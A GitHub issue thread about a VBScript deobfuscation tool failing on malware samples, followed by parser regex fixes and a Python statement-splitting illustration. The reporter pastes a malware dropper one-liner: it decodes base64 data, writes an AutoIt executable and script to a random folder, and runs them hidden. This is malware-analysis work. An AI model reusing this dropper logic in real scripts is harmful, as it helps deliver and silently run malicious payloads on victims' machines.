
No payload extracted from vbscript #18

Open
harold-ogden-walmart opened this issue Oct 28, 2019 · 2 comments

Comments

@harold-ogden-walmart

df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b
d62b0beb27e3b97923f9263a379492bfdf08a3dbcbb16c0af5a86420f5b74012
3dffb392f186abf80646ef2375f8989dbde3beba249ea374deddb690fa77b9a7

Sample payload:

    dim FileObject, MSXml2,basee64,tipo,FolderTarget,AutoitName:Set FileObject = CreateObject("Scripting.FileSystemObject"):if FileObject.GetParentFolderName(WScript.ScriptFullName) = "C:\" then:wscript.quit:end if:FolderTarget = "C:\" + RandomString + "\":FileObject.CreateFolder(FolderTarget):AutoitName = RandomString + ".exe":if FileObject.FolderExists("%ALLUSERSPROFILE%\Panda Security") then:AutoitName = "autoit.exe":end if:AutoitScriptName = RandomString + ".au3":Set MSXml2 = CreateObject("MSXml2.DOMDocument"):Set basee64 = MSXml2.createElement("Base64Data"):Set tipo = CreateObject("ADODB.Stream"):basee64.DataType = "bin.base64":tipo.Type = 1:PAZ = replace(PAZ,"KZMiEq",""):basee64.text = PAZ:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitName, 2:tipo.close:Set objFile = FileObject.CreateTextFile(FolderTarget+"pe.bin",True):objFile.Write rGP:objFile.Close:basee64.text = yWi:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitScriptName, 2:tipo.close:CreateObject("Shell.Application").ShellExecute FolderTarget+AutoitName, AutoitScriptName, FolderTarget, "open", 0:Set objFile = FileObject.CreateTextFile(FileObject.GetSpecialFolder(2) + "\test.txt",True):objFile.Write Wscript.ScriptName:objFile.Close:Function RandomString:Dim tmpdata:Randomize:For i = 1 to 8 :tmpdata = tmpdata & Mid("abcdefghijklmnopqrstuvwxyz0123456789", Int((24)*rnd+1),1):Next:RandomString = tmpdata:End Function; C:\scmbrnqn\mthlucts.exe; C:\scmbrnqn\mthlucts.exe klhcrdkv.au3

@malvidin

For df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b, it doesn't return anything even when the -i/--init entry_point is set to qmZlPQ.

malvidin commented Jul 27, 2022

The issue may be in core/statements.py for simple_statement and simple_statement_restricted. Changing the first line for each to the following works on a couple samples, but I did not check if it breaks anything.

    NotAny(Regex(r"End[ \t]Sub|End[ \t]Function", flags=re.IGNORECASE))

This works as well:

    NotAny(CaselessKeyword("End") + (CaselessKeyword("Sub") | CaselessKeyword("Function")))

If this is used in vba_collapse_long_lines(vba_code)

    return re.sub(r'[ \t]+_[ \t]*(\r\n|\r|\n)[ \t]*', ' ', vba_code)
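An added, stand-alone illustration of why the lookahead above matters (not the project's own parser code): a minimal splitter for colon-joined VBScript that applies the same line-collapse regex and then refuses to treat `End Sub`/`End Function` as a simple statement. The sample input is constructed, and `split_statements`/`parse_blocks` are hypothetical helpers written for this example.

```python
import re

# Constructed sample (not the issue's full payload): a colon-joined VBScript
# one-liner with a "_" line continuation, a quoted "C:\" containing a colon,
# and a Function block followed by one more top-level statement.
SAMPLE = (
    'dim FileObject, tipo:Set FileObject = _\r\n    CreateObject("Scripting.FileSystemObject"):'
    'if FileObject.GetParentFolderName(WScript.ScriptFullName) = "C:\\" then:wscript.quit:end if:'
    'Function RandomString:Dim tmpdata:Randomize:For i = 1 to 8 :tmpdata = tmpdata & "x":Next:'
    'RandomString = tmpdata:End Function:MsgBox RandomString'
)
# The guard from the comment above, widened to accept more than one blank or tab.
END_BLOCK = re.compile(r"End[ \t]+(Sub|Function)\b", re.IGNORECASE)
BEGIN_BLOCK = re.compile(r"(Sub|Function)[ \t]+(\w+)", re.IGNORECASE)

def collapse_long_lines(vba_code: str) -> str:
    # Same regex as vba_collapse_long_lines: join "_"-continued lines.
    return re.sub(r'[ \t]+_[ \t]*(\r\n|\r|\n)[ \t]*', ' ', vba_code)

def split_statements(vba_code: str) -> list:
    # Split on ':' and line breaks, but not inside "..." literals ('""' toggles twice).
    stmts, cur, in_str = [], [], False
    for ch in vba_code:
        if ch == '"':
            in_str = not in_str
        if ch in ':\r\n' and not in_str:
            stmts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    stmts.append(''.join(cur).strip())
    return [s for s in stmts if s]

def parse_blocks(vba_code: str, guard_end: bool = True):
    # Returns (top-level statements, {procedure name: body statements}).
    # guard_end=True: 'End Sub'/'End Function' is never taken as a simple statement.
    # guard_end=False: the terminator is swallowed and later statements stay in the body.
    top, procs, current = [], {}, None
    for stmt in split_statements(collapse_long_lines(vba_code)):
        if guard_end and END_BLOCK.match(stmt):
            current = None
            continue
        m = BEGIN_BLOCK.match(stmt)
        if m and current is None:
            current = m.group(2)
            procs[current] = []
            continue
        (procs[current] if current else top).append(stmt)
    return top, procs
```

Run `parse_blocks(SAMPLE)` against `parse_blocks(SAMPLE, guard_end=False)` to see the trailing `MsgBox` statement move from top level into the procedure body when the guard is missing.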
